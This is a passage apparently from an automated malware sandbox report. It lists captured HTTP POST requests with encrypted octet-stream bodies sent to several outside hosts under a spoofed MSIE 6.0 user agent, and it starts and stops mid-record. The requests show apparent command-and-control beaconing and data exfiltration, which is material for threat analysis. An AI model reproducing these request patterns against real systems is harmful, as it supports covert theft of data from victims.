eWtfurWQG5mtWbZVHGoqIK6+Gy1DKhwBuTi2BVQLxqamDKKmHQi2IjFatY3BSOXuNtvCrEY5j0VEeOLlhZrwrJ4oAVJ5gp9/KptdEY0jozQBgbFKooqlF4q6iRClbpm+Sj/iCLBBgc/romfiHCPHBRGOkRHiQeoiVfzMXdLV5lws7ZlmUyLGs6BDEBr2YSrC+vn8RgTUayLWGWnT7ToKMkzva2v4fwFB5gqL8CsniOY0EP+7W4SMgH9kPS6ExAnW6qf3/rnBQfuqV+B3gdsNNhsSkaN2N7xrQUA0ACN0iZuh48LuDUJPdotk11QWdw6XlfsS3JaPR4iS1ewuCxqrbaZngarbtxRUMn0I4da611U658FfihlQDcKuQLpLZtLko0wFRNJkNp2tenlTbHgqap6p5nqIYegiaN24X3o6M5tCOOq+ZGrgBYUI2IvmLH2IjxOSpnKdbmwRRxXvnbbp4M3N081zsC3YhVEx6yYDx+hPA1lYb0PnEr3TfEOww7X4YRv+Ara8DNOORpKxNNToEjRaMB4aYmeVoP7pUD3s7FVnoSER/SmT4HDtnujTEh++65b5GqBtB0c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 74 73 34 46 75 73 2b 4e 47 35 6c 5a 47 34 6f 31 62 71 43 4d 31 74 67 6f 76 39 39 6c 2f 6d 66 7a 63 38 70 68 6a 67 4f 75 4d 63 4f 5a 35 49 75 2f 57 52 45 5a 41 2f 74 4c 4c 69 53 55 61 48 63 69 43 44 58 55 44 67 59 67 50 36 4d 70 34 5a 41 4c 47 58 33 69 77 50 47 4e 69 49 38 65 65 71 38 61 75 4f 32 33 4f 54 42 2b 7a 76 6d 71 73 6e 71 79 34 47 53 30 6e 78 4f 46 30 6a 37 53 56 54 30 6f 32 65 77 53 34 52 4a 37 6e 46 43 4d 58 64 49 43 45 34 33 48 74 4c 34 6e 46 5a 39 2f 46 4d 34 4a 5a 34 43 35 4b 4b 59 52 52 69 75 6e 35 75 48 76 74 56 34 31 61 71 41 5a 35 5a 43 61 68 2b 7a 33 75 73 4e 79 6b 52 2f 76 46 46 4f 6b 4d 6a 48 62 34 36 59 48 4e 76 70 49 76 33 4f 53 66 67 7a 69 61 30 67 2f 79 74 4d 30 61 56 48 32 76 54 4d 42 58 39 7a 6c 4c 35 75 36 57 61 6d 58 32 6f 69 38 70 6e 50 6a 52 63 71 35 34 42 78 6b 72 31 2f 59 73 32 49 47 35 76 56 2b 69 4c 7a 69 4f 36 57 4a 7a 41 53 43 51 4e 69 32 37 66 44 36 62 58 65 63 73 39 44 77 48 2f 5a 30 76 4c 43 68 43 59 67 37 4c 47 45 69 62 56 32 30 62 4e 4c 30 4b 63 49 48 42 4c 52 32 54 57 36 47 69 43 75 4b 58 50 30 4d 56 2f 34 58 37 4b 73 58 41 76 51 54 74 59 73 43 57 68 68 53 79 77 70 6d 4e 44 62 4b 76 64 42 34 70 78 64 49 5a 53 6c 68 74 79 4d 34 38 63 5a 6c 72 6c 51 61 70 2f 59 32 52 75 44 6f 58 50 51 6a 68 66 71 78 69 48 65 4b 43 55 6f 76 72 34 43 51 62 6c 79 36 6a 2b 79 7a 33 56 6e 66 7a 2f 63 44 4a 50 2f 67 38 58 54 6a 4b 48 51 53 67 59 76 39 32 67 68 70 48 67 41 45 75 30 56 67 7a 49 53 57 68 46 50 66 6d 51 53 6f 45 32 64 33 52 74 78 2b 53 6d 54 6c 57 4f 4d 4b 37 54 4a 34 58 75 48 34 2f 73 45 35 6d 5a 79 68 6c 74 79 6a 68 4f 4c 6f 4a 45 5a 69 5a 4c 46 30 4a 38 35 57 77 5a 56 45 4b 59 62 4a 75 36 41 36 54 64 61 50 49 36 45 3d Data Ascii: ts4Fus+NG5lZG4o1bqCM1tgov99l/mfzc8phjgOuMcOZ5Iu/WREZA/tLLiSUaHciCDXUDgYgP6Mp4ZALGX3iwPGNiI8eeq8auO23OTB+zvmqsnqy4GS0nxOF0j7SVT0o2ewS4RJ7nFCMXdICE43HtL4nFZ9/FM4JZ4C5KKYRRiun5uHvtV41aqAZ5ZCah+z3usNykR/vFFOkMjHb46YHNvpIv3OSfgzia0g/ytM0aVH2vTMBX9zlL5u6WamX2oi8pnPjRcq54Bxkr1/Ys2IG5vV+iLziO6WJzASCQNi27fD6bXecs9DwH/Z0vLChCYg7LGEibV20bNL0KcIHBLR2TW6GiCuKXP0MV/4X7KsXAvQTtYsCWhhSywpmNDbKvdB4pxdIZSlhtyM48cZlrlQap/Y2RuDoXPQjhfqxiHeKCUovr4CQbly6j+yz3Vnfz/cDJP/g8XTjKHQSgYv92ghpHgAEu0VgzISWhFPfmQSoE2d3Rtx+SmTlWOMK7TJ4XuH4/sE5mZyhltyjhOLoJEZiZLF0J85WwZVEKYbJu6A6TdaPI6E=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 65 57 74 66 75 72 57 51 47 35 6d 74 57 62 5a 56 48 47 6f 71 49 4b 36 2b 47 79 31 44 4b 68 77 42 75 54 69 32 42 56 51 4c 78 71 61 6d 44 4b 4b 6d 48 51 69 32 49 6a 46 61 74 59 33 42 53 4f 58 75 4e 74 76 43 72 45 59 35 6a 30 56 45 65 4f 4c 6c 68 5a 72 77 72 4a 34 6f 41 56 4a 35 67 70 39 2f 4b 70 74 64 45 59 30 6a 6f 7a 51 42 67 62 46 4b 6f 6f 71 6c 46 34 71 36 69 52 43 6c 62 70 6d 2b 53 6a 2f 69 43 4c 42 42 67 63 2f 72 6f 6d 66 69 48 43 50 48 42 52 47 4f 6b 52 48 69 51 65 6f 69 56 66 7a 4d 58 64 4c 56 35 6c 77 73 37 5a 6c 6d 55 79 4c 47 73 36 42 44 45 42 72 32 59 53 72 43 2b 76 6e 38 52 67 54 55 61 79 4c 57 47 57 6e 54 37 54 6f 4b 4d 6b 7a 76 61 32 76 34 66 77 46 42 35 67 71 4c 38 43 73 6e 69 4f 59 30 45 50 2b 37 57 34 53 4d 67 48 39 6b 50 53 36 45 78 41 6e 57 36 71 66 33 2f 72 6e 42 51 66 75 71 56 2b 42 33 67 64 73 4e 4e 68 73 53 6b 61 4e 32 4e 37 78 72 51 55 41 30 41 43 4e 30 69 5a 75 68 34 38 4c 75 44 55 4a 50 64 6f 74 6b 31 31 51 57 64 77 36 58 6c 66 73 53 33 4a 61 50 52 34 69 53 31 65 77 75 43 78 71 72 62 61 5a 6e 67 61 72 62 74 78 52 55 4d 6e 30 49 34 64 61 36 31 31 55 36 35 38 46 66 69 68 6c 51 44 63 4b 75 51 4c 70 4c 5a 74 4c 6b 6f 30 77 46 52 4e 4a 6b 4e 70 32 74 65 6e 6c 54 62 48 67 71 61 70 36 70 35 6e 71 49 59 65 67 69 61 4e 32 34 58 33 6f 36 4d 35 74 43 4f 4f 71 2b 5a 47 72 67 42 59 55 49 32 49 76 6d 4c 48 32 49 6a 78 4f 53 70 6e 4b 64 62 6d 77 52 52 78 58 76 6e 62 62 70 34 4d 33 4e 30 38 31 7a 73 43 33 59 68 56 45 78 36 79 59 44 78 2b 68 50 41 31 6c 59 62 30 50 6e 45 72 33 54 66 45 4f 77 77 37 58 34 59 52 76 2b 41 72 61 38 44 4e 4f 4f 52 70 4b 78 4e 4e 54 6f 45 6a 52 61 4d 42 34 61 59 6d 65 56 6f 50 37 70 55 44 33 73 37 46 56 6e 6f 53 45 52 2f 53 6d 54 34 48 44 74 6e 75 6a 54 45 68 2b 2b 36 35 62 35 47 71 42 74 42 30 63 3d Data Ascii: eWtfurWQG5mtWbZVHGoqIK6+Gy1DKhwBuTi2BVQLxqamDKKmHQi2IjFatY3BSOXuNtvCrEY5j0VEeOLlhZrwrJ4oAVJ5gp9/KptdEY0jozQBgbFKooqlF4q6iRClbpm+Sj/iCLBBgc/romfiHCPHBRGOkRHiQeoiVfzMXdLV5lws7ZlmUyLGs6BDEBr2YSrC+vn8RgTUayLWGWnT7ToKMkzva2v4fwFB5gqL8CsniOY0EP+7W4SMgH9kPS6ExAnW6qf3/rnBQfuqV+B3gdsNNhsSkaN2N7xrQUA0ACN0iZuh48LuDUJPdotk11QWdw6XlfsS3JaPR4iS1ewuCxqrbaZngarbtxRUMn0I4da611U658FfihlQDcKuQLpLZtLko0wFRNJkNp2tenlTbHgqap6p5nqIYegiaN24X3o6M5tCOOq+ZGrgBYUI2IvmLH2IjxOSpnKdbmwRRxXvnbbp4M3N081zsC3YhVEx6yYDx+hPA1lYb0PnEr3TfEOww7X4YRv+Ara8DNOORpKxNNToEjRaMB4aYmeVoP7pUD3s7FVnoSER/SmT4HDtnujTEh++65b5GqBtB0c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 47 58 61 6d 76 35 61 38 47 35 6b 51 51 55 4b 4c 63 55 71 68 65 6a 6d 53 4e 51 30 32 2f 68 56 56 4b 74 72 41 30 31 52 44 41 42 4a 56 62 4e 32 37 70 7a 61 66 45 30 36 6f 78 4c 79 47 47 6c 63 64 32 56 61 2b 36 46 53 73 71 4d 48 62 6f 6e 4f 6b 38 43 4e 48 36 5a 30 34 2b 62 6d 71 4d 35 58 50 55 34 36 7a 59 4d 64 38 4d 4a 4c 73 39 4b 45 6b 4c 4b 73 77 69 74 38 48 61 50 4c 53 54 4e 44 38 7a 77 32 4e 67 4f 79 4a 39 57 79 5a 6d 62 70 39 37 37 74 45 59 44 50 39 54 56 45 30 46 2f 53 48 58 6f 65 31 6f 43 6b 2b 4d 32 68 4e 75 5a 68 4c 6e 6b 30 42 45 55 76 6d 45 6a 6c 76 7a 52 68 79 58 7a 72 53 43 2b 55 6b 64 31 45 55 7a 51 6a 70 6c 69 64 6e 52 55 41 42 50 41 55 32 4f 4c 6a 58 4d 4d 6c 52 52 4b 44 71 74 75 49 48 5a 76 78 6d 53 62 49 36 36 72 57 2f 37 63 46 33 43 61 35 74 58 35 71 76 66 53 35 66 37 78 35 64 35 77 69 5a 65 79 78 4c 4e 43 4e 79 6d 4c 71 30 4d 63 45 67 50 50 32 65 68 38 4c 34 35 66 65 45 6f 73 38 64 2b 78 47 47 49 49 66 53 4c 46 63 42 4e 37 75 5a 67 4f 5a 6b 76 4a 44 54 66 5a 57 4c 6b 70 43 4e 64 45 30 39 54 64 68 44 68 2f 79 61 56 70 30 78 51 31 56 41 36 61 7a 53 54 4e 6e 6a 38 6c 4f 72 2f 34 58 53 72 7a 32 66 75 45 33 33 4b 45 5a 4d 77 50 41 68 77 35 34 4d 51 73 69 6b 38 56 69 55 61 6d 39 6a 39 53 39 41 30 69 41 6e 43 36 32 6c 6c 77 46 45 2b 63 44 7a 6b 6e 69 70 6c 51 62 70 64 58 49 78 50 75 35 52 4c 65 64 53 76 67 62 30 2b 47 37 50 6b 70 56 4b 6b 4a 45 44 49 45 32 45 67 69 61 6c 54 54 68 63 4f 33 76 4e 62 36 34 44 4c 79 33 55 41 34 51 49 71 37 61 7a 68 64 71 6e 4b 48 30 39 53 6e 2b 72 63 65 78 58 43 69 68 55 7a 54 71 77 31 4f 49 57 41 36 2f 37 51 68 53 30 69 69 44 39 51 64 48 46 49 52 68 69 6b 79 54 74 43 73 69 46 33 4d 45 37 2f 2b 50 42 6d 4d 61 4b 4c 2b 63 6a 32 70 73 3d Data Ascii: GXamv5a8G5kQQUKLcUqhejmSNQ02/hVVKtrA01RDABJVbN27pzafE06oxLyGGlcd2Va+6FSsqMHbonOk8CNH6Z04+bmqM5XPU46zYMd8MJLs9KEkLKswit8HaPLSTND8zw2NgOyJ9WyZmbp977tEYDP9TVE0F/SHXoe1oCk+M2hNuZhLnk0BEUvmEjlvzRhyXzrSC+Ukd1EUzQjplidnRUABPAU2OLjXMMlRRKDqtuIHZvxmSbI66rW/7cF3Ca5tX5qvfS5f7x5d5wiZeyxLNCNymLq0McEgPP2eh8L45feEos8d+xGGIIfSLFcBN7uZgOZkvJDTfZWLkpCNdE09TdhDh/yaVp0xQ1VA6azSTNnj8lOr/4XSrz2fuE33KEZMwPAhw54MQsik8ViUam9j9S9A0iAnC62llwFE+cDzkniplQbpdXIxPu5RLedSvgb0+G7PkpVKkJEDIE2EgialTThcO3vNb64DLy3UA4QIq7azhdqnKH09Sn+rcexXCihUzTqw1OIWA6/7QhS0iiD9QdHFIRhikyTtCsiF3ME7/+PBmMaKL+cj2ps=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 6d 42 59 46 63 6e 47 48 49 5a 6d 51 45 56 6c 56 6b 4e 6f 69 6d 63 6f 73 31 7a 4b 76 58 64 51 66 4e 61 57 58 70 63 56 4b 53 51 4f 71 49 67 77 45 2f 55 38 73 41 6b 47 6f 4e 4f 58 59 37 56 4c 48 63 64 58 50 4b 63 66 53 62 58 4a 64 70 54 39 4b 68 66 74 53 78 70 78 52 37 75 66 50 63 51 52 32 36 76 36 65 33 4d 47 55 5a 7a 61 46 76 30 79 4b 51 75 67 65 51 64 6a 33 45 63 33 45 66 4c 50 45 35 75 77 78 2b 30 59 31 52 46 6b 45 43 79 54 2f 51 4d 4f 72 65 4a 78 35 59 58 58 65 48 34 76 4d 41 54 68 44 4c 62 53 53 44 67 7a 44 47 42 68 76 74 6a 79 62 7a 52 66 5a 4a 2f 45 6d 42 31 6a 31 64 6d 2b 65 52 2b 51 41 41 2f 78 6e 6a 64 6b 49 63 64 4e 45 69 4a 42 6f 31 61 52 38 4d 78 43 47 4d 65 43 53 73 51 6d 6d 4c 65 47 4b 41 76 57 32 38 32 33 67 53 37 64 73 30 36 4b 55 6b 2f 64 7a 79 70 6c 57 78 79 63 38 42 6f 46 4c 42 6b 31 70 75 61 39 48 54 76 2b 58 34 53 68 57 4c 6b 36 51 31 6a 73 65 4b 49 45 67 4c 47 74 47 53 62 58 6a 4f 6e 33 75 68 50 48 46 58 4a 52 51 4f 2b 52 73 38 30 41 57 63 75 65 37 70 4d 33 4c 72 4f 61 61 4c 75 5a 51 4c 74 66 42 62 62 2b 77 51 6e 44 63 6b 34 2b 61 72 65 73 37 5a 6a 4b 43 61 71 79 74 6c 62 38 68 48 37 52 33 4a 37 35 55 71 6d 39 67 56 36 42 33 34 4f 68 63 32 78 4b 6b 77 53 4d 55 35 2f 48 69 4c 70 43 45 6e 4d 49 52 68 77 70 6f 41 2f 59 49 35 6e 53 2b 6e 51 49 7a 67 54 74 6e 58 6e 75 57 65 46 79 33 74 2b 77 41 4b 59 33 61 63 67 53 50 31 55 67 32 59 74 51 6a 39 4b 47 2b 39 47 58 69 68 49 59 34 65 68 32 61 59 62 78 56 62 4f 4f 6b 57 56 67 34 70 61 54 71 6a 6f 58 4a 79 33 45 67 74 76 30 4f 6d 73 41 49 73 42 48 45 43 48 66 2f 5a 4d 36 78 47 37 69 50 76 63 56 30 6e 58 45 33 4a 4b 49 3d Data Ascii: mBYFcnGHIZmQEVlVkNoimcos1zKvXdQfNaWXpcVKSQOqIgwE/U8sAkGoNOXY7VLHcdXPKcfSbXJdpT9KhftSxpxR7ufPcQR26v6e3MGUZzaFv0yKQugeQdj3Ec3EfLPE5uwx+0Y1RFkECyT/QMOreJx5YXXeH4vMAThDLbSSDgzDGBhvtjybzRfZJ/EmB1j1dm+eR+QAA/xnjdkIcdNEiJBo1aR8MxCGMeCSsQmmLeGKAvW2823gS7ds06KUk/dzyplWxyc8BoFLBk1pua9HTv+X4ShWLk6Q1jseKIEgLGtGSbXjOn3uhPHFXJRQO+Rs80AWcue7pM3LrOaaLuZQLtfBbb+wQnDck4+ares7ZjKCaqytlb8hH7R3J75Uqm9gV6B34Ohc2xKkwSMU5/HiLpCEnMIRhwpoA/YI5nS+nQIzgTtnXnuWeFy3t+wAKY3acgSP1Ug2YtQj9KG+9GXihIY4eh2aYbxVbOOkWVg4paTqjoXJy3Egtv0OmsAIsBHECHf/ZM6xG7iPvcV0nXE3JKI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 6d 42 59 46 63 6e 47 48 49 5a 6d 51 45 56 6c 56 6b 4e 6f 69 6d 63 6f 73 31 7a 4b 76 58 64 51 66 4e 61 57 58 70 63 56 4b 53 51 4f 71 49 67 77 45 2f 55 38 73 41 6b 47 6f 4e 4f 58 59 37 56 4c 48 63 64 58 50 4b 63 66 53 62 58 4a 64 70 54 39 4b 68 66 74 53 78 70 78 52 37 75 66 50 63 51 52 32 36 76 36 65 33 4d 47 55 5a 7a 61 46 76 30 79 4b 51 75 67 65 51 64 6a 33 45 63 33 45 66 4c 50 45 35 75 77 78 2b 30 59 31 52 46 6b 45 43 79 54 2f 51 4d 4f 72 65 4a 78 35 59 58 58 65 48 34 76 4d 41 54 68 44 4c 62 53 53 44 67 7a 44 47 42 68 76 74 6a 79 62 7a 52 66 5a 4a 2f 45 6d 42 31 6a 31 64 6d 2b 65 52 2b 51 41 41 2f 78 6e 6a 64 6b 49 63 64 4e 45 69 4a 42 6f 31 61 52 38 4d 78 43 47 4d 65 43 53 73 51 6d 6d 4c 65 47 4b 41 76 57 32 38 32 33 67 53 37 64 73 30 36 4b 55 6b 2f 64 7a 79 70 6c 57 78 79 63 38 42 6f 46 4c 42 6b 31 70 75 61 39 48 54 76 2b 58 34 53 68 57 4c 6b 36 51 31 6a 73 65 4b 49 45 67 4c 47 74 47 53 62 58 6a 4f 6e 33 75 68 50 48 46 58 4a 52 51 4f 2b 52 73 38 30 41 57 63 75 65 37 70 4d 33 4c 72 4f 61 61 4c 75 5a 51 4c 74 66 42 62 62 2b 77 51 6e 44 63 6b 34 2b 61 72 65 73 37 5a 6a 4b 43 61 71 79 74 6c 62 38 68 48 37 52 33 4a 37 35 55 71 6d 39 67 56 36 42 33 34 4f 68 63 32 78 4b 6b 77 53 4d 55 35 2f 48 69 4c 70 43 45 6e 4d 49 52 68 77 70 6f 41 2f 59 49 35 6e 53 2b 6e 51 49 7a 67 54 74 6e 58 6e 75 57 65 46 79 33 74 2b 77 41 4b 59 33 61 63 67 53 50 31 55 67 32 59 74 51 6a 39 4b 47 2b 39 47 58 69 68 49 59 34 65 68 32 61 59 62 78 56 62 4f 4f 6b 57 56 67 34 70 61 54 71 6a 6f 58 4a 79 33 45 67 74 76 30 4f 6d 73 41 49 73 42 48 45 43 48 66 2f 5a 4d 36 78 47 37 69 50 76 63 56 30 6e 58 45 33 4a 4b 49 3d Data Ascii: mBYFcnGHIZmQEVlVkNoimcos1zKvXdQfNaWXpcVKSQOqIgwE/U8sAkGoNOXY7VLHcdXPKcfSbXJdpT9KhftSxpxR7ufPcQR26v6e3MGUZzaFv0yKQugeQdj3Ec3EfLPE5uwx+0Y1RFkECyT/QMOreJx5YXXeH4vMAThDLbSSDgzDGBhvtjybzRfZJ/EmB1j1dm+eR+QAA/xnjdkIcdNEiJBo1aR8MxCGMeCSsQmmLeGKAvW2823gS7ds06KUk/dzyplWxyc8BoFLBk1pua9HTv+X4ShWLk6Q1jseKIEgLGtGSbXjOn3uhPHFXJRQO+Rs80AWcue7pM3LrOaaLuZQLtfBbb+wQnDck4+ares7ZjKCaqytlb8hH7R3J75Uqm9gV6B34Ohc2xKkwSMU5/HiLpCEnMIRhwpoA/YI5nS+nQIzgTtnXnuWeFy3t+wAKY3acgSP1Ug2YtQj9KG+9GXihIY4eh2aYbxVbOOkWVg4paTqjoXJy3Egtv0OmsAIsBHECHf/ZM6xG7iPvcV0nXE3JKI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 45 4f 39 69 31 74 62 4a 4a 4a 6d 63 46 74 4b 77 73 58 65 65 59 58 6c 4e 38 76 6c 32 70 42 34 38 61 68 73 56 68 2b 67 69 56 51 32 56 4d 68 35 4c 4d 65 53 2b 62 7a 52 75 6e 62 33 75 5a 47 6f 78 4f 34 5a 44 57 71 4f 43 6f 70 46 34 4e 41 48 77 77 78 45 32 37 4c 50 44 34 33 66 35 76 2f 54 71 32 2b 32 35 33 63 68 74 72 2f 75 30 79 68 6f 4a 36 37 53 72 54 75 51 33 75 2b 39 71 47 66 44 4a 64 66 50 6a 54 64 30 66 7a 69 34 7a 4b 4b 51 49 47 70 76 74 69 36 65 73 73 45 2f 70 4a 36 71 42 6b 53 37 48 47 70 53 65 48 2f 33 78 38 47 49 47 5a 77 30 76 62 47 2b 6a 51 54 62 39 36 6e 73 38 6a 49 72 76 4e 50 51 66 62 52 46 6f 41 6f 5a 55 46 53 4e 42 41 6f 59 49 76 59 5a 33 47 6c 6c 53 71 37 2f 4f 57 63 47 51 31 2b 61 4f 49 45 41 46 48 53 4c 59 79 66 52 70 32 70 58 30 4a 41 6a 37 6f 6e 57 4c 51 46 7a 63 4e 64 36 2b 71 55 79 52 30 6e 79 4f 78 36 32 68 4f 76 56 34 76 78 6a 39 68 70 4c 44 64 71 73 4e 30 64 6f 65 75 31 6e 4a 56 50 36 34 56 2f 6d 64 61 77 42 6d 4d 6a 74 2f 76 76 38 6a 6c 58 44 77 42 4e 46 61 66 64 56 50 61 33 33 68 6f 34 55 4e 41 76 34 38 4f 4a 34 77 70 79 77 54 6e 32 63 6c 79 72 30 51 43 4c 74 6c 74 62 6a 6b 75 42 4e 4b 76 63 34 48 6c 4c 45 6d 37 4d 33 63 36 52 74 4d 47 52 54 36 53 50 35 72 2b 5a 6a 41 74 6c 59 46 65 47 38 52 61 77 62 61 36 31 54 6f 6c 33 78 36 5a 71 6e 36 53 55 44 54 66 6f 64 41 67 5a 36 5a 33 4d 34 6d 4b 79 59 31 5a 4c 42 54 38 50 30 58 6f 6b 35 43 43 30 65 69 6c 42 37 6b 57 45 49 6c 4e 67 66 4e 2f 32 50 2f 71 63 65 76 69 49 63 78 43 32 44 4b 74 66 46 7a 71 4e 6c 5a 41 30 50 69 79 55 5a 68 46 5a 5a 75 41 61 75 4a 33 7a 67 54 5a 4a 64 6f 44 53 5a 43 34 7a 5a 32 6e 38 59 77 4a 36 74 72 48 32 58 73 74 5a 62 6f 57 55 2f 64 52 5a 66 67 68 37 79 58 35 46 7a 4f 32 6d 47 73 48 76 58 33 6d 38 56 39 62 44 54 72 35 55 59 37 71 59 2b 6c 62 41 3d 3d Data Ascii: EO9i1tbJJJmcFtKwsXeeYXlN8vl2pB48ahsVh+giVQ2VMh5LMeS+bzRunb3uZGoxO4ZDWqOCopF4NAHwwxE27LPD43f5v/Tq2+253chtr/u0yhoJ67SrTuQ3u+9qGfDJdfPjTd0fzi4zKKQIGpvti6essE/pJ6qBkS7HGpSeH/3x8GIGZw0vbG+jQTb96ns8jIrvNPQfbRFoAoZUFSNBAoYIvYZ3GllSq7/OWcGQ1+aOIEAFHSLYyfRp2pX0JAj7onWLQFzcNd6+qUyR0nyOx62hOvV4vxj9hpLDdqsN0doeu1nJVP64V/mdawBmMjt/vv8jlXDwBNFafdVPa33ho4UNAv48OJ4wpywTn2clyr0QCLtltbjkuBNKvc4HlLEm7M3c6RtMGRT6SP5r+ZjAtlYFeG8Rawba61Tol3x6Zqn6SUDTfodAgZ6Z3M4mKyY1ZLBT8P0Xok5CC0eilB7kWEIlNgfN/2P/qceviIcxC2DKtfFzqNlZA0PiyUZhFZZuAauJ3zgTZJdoDSZC4zZ2n8YwJ6trH2XstZboWU/dRZfgh7yX5FzO2mGsHvX3m8V9bDTr5UY7qY+lbA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 47 58 61 6d 76 35 61 38 47 35 6b 51 51 55 4b 4c 63 55 71 68 65 6a 6d 53 4e 51 30 32 2f 68 56 56 4b 74 72 41 30 31 52 44 41 42 4a 56 62 4e 32 37 70 7a 61 66 45 30 36 6f 78 4c 79 47 47 6c 63 64 32 56 61 2b 36 46 53 73 71 4d 48 62 6f 6e 4f 6b 38 43 4e 48 36 5a 30 34 2b 62 6d 71 4d 35 58 50 55 34 36 7a 59 4d 64 38 4d 4a 4c 73 39 4b 45 6b 4c 4b 73 77 69 74 38 48 61 50 4c 53 54 4e 44 38 7a 77 32 4e 67 4f 79 4a 39 57 79 5a 6d 62 70 39 37 37 74 45 59 44 50 39 54 56 45 30 46 2f 53 48 58 6f 65 31 6f 43 6b 2b 4d 32 68 4e 75 5a 68 4c 6e 6b 30 42 45 55 76 6d 45 6a 6c 76 7a 52 68 79 58 7a 72 53 43 2b 55 6b 64 31 45 55 7a 51 6a 70 6c 69 64 6e 52 55 41 42 50 41 55 32 4f 4c 6a 58 4d 4d 6c 52 52 4b 44 71 74 75 49 48 5a 76 78 6d 53 62 49 36 36 72 57 2f 37 63 46 33 43 61 35 74 58 35 71 76 66 53 35 66 37 78 35 64 35 77 69 5a 65 79 78 4c 4e 43 4e 79 6d 4c 71 30 4d 63 45 67 50 50 32 65 68 38 4c 34 35 66 65 45 6f 73 38 64 2b 78 47 47 49 49 66 53 4c 46 63 42 4e 37 75 5a 67 4f 5a 6b 76 4a 44 54 66 5a 57 4c 6b 70 43 4e 64 45 30 39 54 64 68 44 68 2f 79 61 56 70 30 78 51 31 56 41 36 61 7a 53 54 4e 6e 6a 38 6c 4f 72 2f 34 58 53 72 7a 32 66 75 45 33 33 4b 45 5a 4d 77 50 41 68 77 35 34 4d 51 73 69 6b 38 56 69 55 61 6d 39 6a 39 53 39 41 30 69 41 6e 43 36 32 6c 6c 77 46 45 2b 63 44 7a 6b 6e 69 70 6c 51 62 70 64 58 49 78 50 75 35 52 4c 65 64 53 76 67 62 30 2b 47 37 50 6b 70 56 4b 6b 4a 45 44 49 45 32 45 67 69 61 6c 54 54 68 63 4f 33 76 4e 62 36 34 44 4c 79 33 55 41 34 51 49 71 37 61 7a 68 64 71 6e 4b 48 30 39 53 6e 2b 72 63 65 78 58 43 69 68 55 7a 54 71 77 31 4f 49 57 41 36 2f 37 51 68 53 30 69 69 44 39 51 64 48 46 49 52 68 69 6b 79 54 74 43 73 69 46 33 4d 45 37 2f 2b 50 42 6d 4d 61 4b 4c 2b 63 6a 32 70 73 3d Data Ascii: GXamv5a8G5kQQUKLcUqhejmSNQ02/hVVKtrA01RDABJVbN27pzafE06oxLyGGlcd2Va+6FSsqMHbonOk8CNH6Z04+bmqM5XPU46zYMd8MJLs9KEkLKswit8HaPLSTND8zw2NgOyJ9WyZmbp977tEYDP9TVE0F/SHXoe1oCk+M2hNuZhLnk0BEUvmEjlvzRhyXzrSC+Ukd1EUzQjplidnRUABPAU2OLjXMMlRRKDqtuIHZvxmSbI66rW/7cF3Ca5tX5qvfS5f7x5d5wiZeyxLNCNymLq0McEgPP2eh8L45feEos8d+xGGIIfSLFcBN7uZgOZkvJDTfZWLkpCNdE09TdhDh/yaVp0xQ1VA6azSTNnj8lOr/4XSrz2fuE33KEZMwPAhw54MQsik8ViUam9j9S9A0iAnC62llwFE+cDzkniplQbpdXIxPu5RLedSvgb0+G7PkpVKkJEDIE2EgialTThcO3vNb64DLy3UA4QIq7azhdqnKH09Sn+rcexXCihUzTqw1OIWA6/7QhS0iiD9QdHFIRhikyTtCsiF3ME7/+PBmMaKL+cj2ps=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 56 4e 44 2f 71 6d 47 78 4b 35 6d 4d 6c 39 34 52 77 4a 76 4d 76 6a 6f 63 48 35 31 66 6c 74 47 51 4a 66 61 67 47 53 72 32 61 54 74 6f 54 6d 31 66 66 36 4e 47 4c 57 52 4b 6b 56 39 78 6b 46 70 67 44 32 6f 4c 78 49 6c 35 42 2b 44 48 4e 69 4c 55 79 58 52 36 58 7a 78 47 30 36 63 4e 43 30 33 49 56 45 75 2b 51 75 36 6b 71 6f 61 42 66 65 4e 50 66 4b 73 4b 4e 6a 32 54 6d 79 30 37 6b 64 62 69 47 64 59 45 45 6b 41 79 7a 37 64 41 56 78 58 65 45 6e 6a 53 63 6f 49 48 70 79 6b 74 4e 41 47 54 4f 58 42 33 62 51 41 78 34 52 47 73 36 2b 76 30 4a 33 57 48 56 4f 51 62 76 38 74 41 78 6a 43 2f 64 31 6c 39 61 38 58 53 43 53 73 61 48 68 35 37 48 51 6f 54 41 2b 58 43 65 50 6a 41 45 54 54 54 69 73 39 39 2f 38 69 6e 31 4b 37 72 5a 6b 4b 75 44 41 45 62 76 62 36 37 48 35 78 48 5a 51 4f 67 69 46 70 39 66 76 6b 34 47 52 65 36 47 32 2b 34 